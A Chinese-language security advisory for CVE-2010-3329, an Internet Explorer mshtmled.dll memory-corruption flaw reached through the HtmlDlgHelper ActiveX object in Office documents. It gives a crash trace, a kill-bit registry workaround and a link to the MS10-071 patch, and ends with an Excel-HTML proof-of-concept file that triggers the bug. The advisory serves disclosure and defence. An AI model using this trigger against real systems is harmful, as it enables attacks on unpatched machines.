BUGTRAQ ID: 43706
CVE ID: CVE-2010-3329
Internet Explorer是Windows操作系统中默认捆绑的WEB浏览器。
Windows在实例化Office文档(如.XLS、.DOC)中HtmlDlgHelper类对象(CLASSID: 3050f4e1-98b5-11cf-bb82-00aa00bdce0b)的方式存在内存破坏漏洞。有漏洞的模块是Internet Explorer中的mshtmled.dll,当调用CHtmlDlgHelper类的析构程序之后访问未初始化内存时就会在mshtmled.dll 中触发这个漏洞。以下是出现了漏洞的代码段:
mshtmled!ReleaseInterface:
42b919c0 8bff mov edi,edi
42b919c2 55 push ebp
42b919c3 8bec mov ebp,esp
42b919c5 8b4508 mov eax,dword ptr [ebp+8] ss:0023:0013d104=00310065
42b919c8 85c0 test eax,eax
42b919ca 7406 je mshtmled!ReleaseInterface+0x12 (42b919d2) [br=0]
42b919cc 8b08 mov ecx,dword ptr [eax] ds:0023:00310065
42b919ce 50 push eax
42b919cf ff5108 call dword ptr [ecx+8] ds:0023:7d02029c=2a2c277a
eax=00310065 ebx=00000000 ecx=7d020294 edx=df0b3d60 esi=001edbdc edi=00000000
eip=2a2c277a esp=0013d0f4 ebp=0013d0fc iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
Stack Trace:
<Unloaded_ion.dll>+0x2a2c2779
mshtmled!ReleaseInterface+0x12
mshtmled!CHtmlDlgHelper::~CHtmlDlgHelper+0x10
mshtmled!ATL::CComAggObject<CHtmlDlgHelper>::`scalar deleting destructor’+0xd
mshtmled!ATL::CComAggObject<CHtmlDlgHelper>::Release+0x27
VBE6!rtcStrConvVar+0xbd65
VBE6!rtcSetDatabaseLcid+0xa823
EXCEL!Ordinal41+0xd2ad0
EXCEL!Ordinal41+0x14082a
USER32!CallWindowProcW+0x1b
Instruction Address: 0x000000002a2c277a
Microsoft Internet Explorer 8.0
Microsoft Internet Explorer 7.0
临时解决方法:
如果要对CLSID值{3050f4e1-98b5-11cf-bb82-00aa00bdce0b}设置kill bit,在文本编辑器(如写字板)中粘贴以下文本然后使用.reg文件名扩展保存文件。
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility{3050f4e1-98b5-11cf-bb82-00aa00bdce0b}]
"Compatibility Flags"=dword:00000400
通过双击将这个.reg文件应用到单个系统。
厂商补丁:
Microsoft已经为此发布了一个安全公告(MS10-071)以及相应补丁:
MS10-071:Cumulative Security Update for Internet Explorer (2360131)
链接:http://www.microsoft.com/technet/security/bulletin/MS10-071.mspx?pf=true
<html xmlns:v="urn:schemas-microsoft-com:vml"
xmlns:o="urn:schemas-microsoft-com:office:office"
xmlns:x="urn:schemas-microsoft-com:office:excel">
<head>
<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
<meta name=ProgId content=Excel.Sheet>
<meta name=Generator content="Microsoft Excel 10">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
o\:* {behavior:url(#default#VML);}
x\:* {behavior:url(#default#VML);}
.shape {behavior:url(#default#VML);}
</style>
<![endif]--><!--[if gte mso 9]><xml>
<o:DocumentProperties>
<o:LastAuthor>TEST</o:LastAuthor>
<o:LastSaved>2010-08-03T05:19:51Z</o:LastSaved>
<o:Version>10.6858</o:Version>
</o:DocumentProperties>
<o:OfficeDocumentSettings>
<o:DownloadComponents/>
</o:OfficeDocumentSettings>
</xml><![endif]-->
<!--[if gte mso 9]><xml>
<x:ExcelWorkbook>
<x:ExcelWorksheets>
<x:ExcelWorksheet>
<x:Name>test</x:Name>
<x:WorksheetOptions>
<x:CodeName>Sheet1</x:CodeName>
<x:Selected/>
<x:DoNotDisplayGridlines/>
<x:ProtectContents>False</x:ProtectContents>
<x:ProtectObjects>False</x:ProtectObjects>
<x:ProtectScenarios>False</x:ProtectScenarios>
</x:WorksheetOptions>
</x:ExcelWorksheet>
</x:ExcelWorksheets>
<x:WindowHeight>9345</x:WindowHeight>
<x:WindowWidth>13260</x:WindowWidth>
<x:WindowTopX>240</x:WindowTopX>
<x:WindowTopY>60</x:WindowTopY>
<x:ProtectStructure>False</x:ProtectStructure>
<x:ProtectWindows>False</x:ProtectWindows>
</x:ExcelWorkbook>
</xml><![endif]--><!--[if gte mso 9]><xml>
<o:shapedefaults v:ext="edit" spidmax="1026"/>
</xml><![endif]--><!--[if gte mso 9]><xml>
<o:shapelayout v:ext="edit">
<o:idmap v:ext="edit" data="1"/>
</o:shapelayout></xml><![endif]-->
</head>
<body link=blue vlink=purple>
<table x:str border=0 cellpadding=0 cellspacing=0 width=64 style='border-collapse:
collapse;table-layout:fixed;width:48pt'>
<col width=64 style='width:48pt'>
<tr height=17 style='height:12.75pt'>
<td height=17 width=64 style='height:12.75pt;width:48pt' align=left
valign=top><!--[if gte vml 1]><v:shapetype id="_x0000_t201" coordsize="21600,21600"
o:spt="201" path="m,l,21600r21600,l21600,xe">
<v:stroke joinstyle="miter"/>
<v:path shadowok="f" o:extrusionok="f" strokeok="f" fillok="f"
o:connecttype="rect"/>
<o:lock v:ext="edit" shapetype="t"/>
</v:shapetype><v:shape id="_x0000_s1025" type="#_x0000_t201" style='position:absolute;
margin-left:0;margin-top:0;width:48pt;height:12.75pt;z-index:1'
strokecolor="windowText [64]" o:insetmode="auto">
<![if gte mso 9]><o:title=""/>
<![endif]><x:ClientData ObjectType="Pict">
<x:SizeWithCells/>
<x:CF>Pict</x:CF>
<x:AutoPict/>
</x:ClientData>
</v:shape><![endif]--><![if !vml]><span style='mso-ignore:vglayout;
position:absolute;z-index:1;margin-left:0px;margin-top:0px;width:64px;
height:17px'><![endif]>
<object classid="CLSID:3050F4E1-98B5-11CF-BB82-00AA00BDCE0B" id=obj></object>
<![if !vml]></span><![endif]><span
style='mso-ignore:vglayout2'>
<table cellpadding=0 cellspacing=0>
<tr>
<td height=17 width=64 style='height:12.75pt;width:48pt'></td>
</tr>
</table>
</span></td>
</tr>
<![if supportMisalignedColumns]>
<tr height=0 style='display:none'>
<td width=64 style='width:48pt'></td>
</tr>
<![endif]>
</table>
</body>
</html>